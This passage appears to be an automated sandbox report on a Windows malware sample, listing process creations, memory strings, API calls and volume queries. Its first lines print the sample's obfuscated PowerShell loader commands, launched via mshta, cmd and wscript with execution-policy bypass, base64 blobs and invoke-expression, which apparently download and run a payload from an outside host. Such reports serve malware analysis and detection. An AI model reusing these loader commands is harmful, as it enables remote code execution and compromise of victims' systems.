lcmluz3mnlccxjywnjgjhy2tzy2f0dgvyaw5ncycsjycpkts=';$hypoxanthine = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($capellmeister));invoke-expression $hypoxanthine
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jerjrkpzicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurelvr5ugugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfumrfrklosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagcm0sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiejpsuzxtmtqbcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkzoc0dslhvpbnqgicagicagicagicagicagicagicagicagicagicagicagse1kagh1leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb4a0ipoycgicagicagicagicagicagicagicagicagicagicagicaglw5btuugicagicagicagicagicagicagicagicagicagicagicagillqiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzvnqqwnlicagicagicagicagicagicagicagicagicagicagicagihrkau5ydhjnicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjerjrkpzojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtiylje1os8xmjevc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29pbmdvbi50suyilcikrw5wokfquerbvefcl3npbxbszwdyzwf0zmvhdhvyzxn3axrobmljzxnwzwfraw5ndghpbmdzzw50axjlbglmzwdvas52ylmildasmck7u1rhulqtu0xlzxaomyk7su52b2tflwv4ufjlu1npt24gicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvwvc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29plnziuyi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jerjrkpzicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurelvr5ugugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfumrfrklosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagcm0sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiejpsuzxtmtqbcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkzoc0dslhvpbnqgicagicagicagicagicagicagicagicagicagicagicagse1kagh1leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb4a0ipoycgicagicagicagicagicagicagicagicagicagicagicaglw5btuugicagicagicagicagicagicagicagicagicagicagicagillqiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzvnqqwnlicagicagicagicagicagicagicagicagicagicagicagihrkau5ydhjnicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjerjrkpzojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtiylje1os8xmjevc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29pbmdvbi50suyilcikrw5wokfquerbvefcl3npbxbszwdyzwf0zmvhdhvyzxn3axrobmljzxnwzwfraw5ndghpbmdzzw50axjlbglmzwdvas52ylmildasmck7u1rhulqtu0xlzxaomyk7su52b2tflwv4ufjlu1npt24gicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvwvc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29plnziuyi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $capellmeister = 'jg5vbmv2ywx1yxrpdmugpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskzxj5dghyb3n0b211bsa9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jhbpzwhvbgvzid0gjgvyexrocm9zdg9tdw0urg93bmxvywreyxrhkcrub25ldmfsdwf0axzlktskcgxhy29kzxjtyxrvdxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcgllag9szxmpoyriyw5kym94id0gjzw8qkftrty0x1nuqvjupj4noyr5zw1hbia9icc8pejbu0u2nf9ftkq+pic7jhbyzwxhy3kgpsakcgxhy29kzxjtyxrvdxmusw5kzxhpzigkymfuzgjveck7jgzhbwvkid0gjhbsywnvzgvybwf0b3vzlkluzgv4t2yojhllbwfuktskchjlbgfjesatz2ugmcatyw5kicrmyw1lzcatz3qgjhbyzwxhy3k7jhbyzwxhy3kgkz0gjgjhbmrib3gutgvuz3rooyr3axrlbmfnzw1vdca9icrmyw1lzcaticrwcmvsywn5oyrzb3bob21hbmlhyya9icrwbgfjb2rlcm1hdg91cy5tdwjzdhjpbmcojhbyzwxhy3ksicr3axrlbmfnzw1vdck7jgdyawzmaw4gpsatam9pbiaojhnvcghvbwfuawfjllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrzb3bob21hbmlhyy5mzw5ndggpxtskyxv0b3bsb2lkesa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojgdyawzmaw4poyrszwrlcml0zsa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgf1dg9wbg9pzhkpoyr1bmjpb3r1cmjhdgvkid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jhvuymlvdhvyymf0zwqusw52b2tlkcrudwxslcbakccwlzfeykjwl3ivzwuuzxrzyxavlzpzchr0accsicckymfja3njyxr0zxjpbmdzjywgjyriywnrc2nhdhrlcmluz3mnlcanjgjhy2tzy2f0dgvyaw5ncycsicddyxnqb2wnlcanjgjhy2tzy2f0dgvyaw5ncycsicckymfja3njyxr0zxjpbmdzjywnjgjhy2tzy2f0dgvyaw5ncycsjyriywnrc2nhdhrlcmluz3mnlcckymfja3njyxr0zxjpbmdzjywnjgjhy2tzy2f0dgvyaw5ncycsjyriywnrc2nhdhrlcmluz3mnlccxjywnjgjhy2tzy2f0dgvyaw5ncycsjycpkts=';$hypoxanthine = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($capellmeister));invoke-expression $hypoxanthineJump to behavior
                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk
                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager*
                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433E1A cpuid 12_2_00433E1A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,12_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004510CA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_004470BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004512FA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513C7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004475A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450D52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450D07
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450DED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E7A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
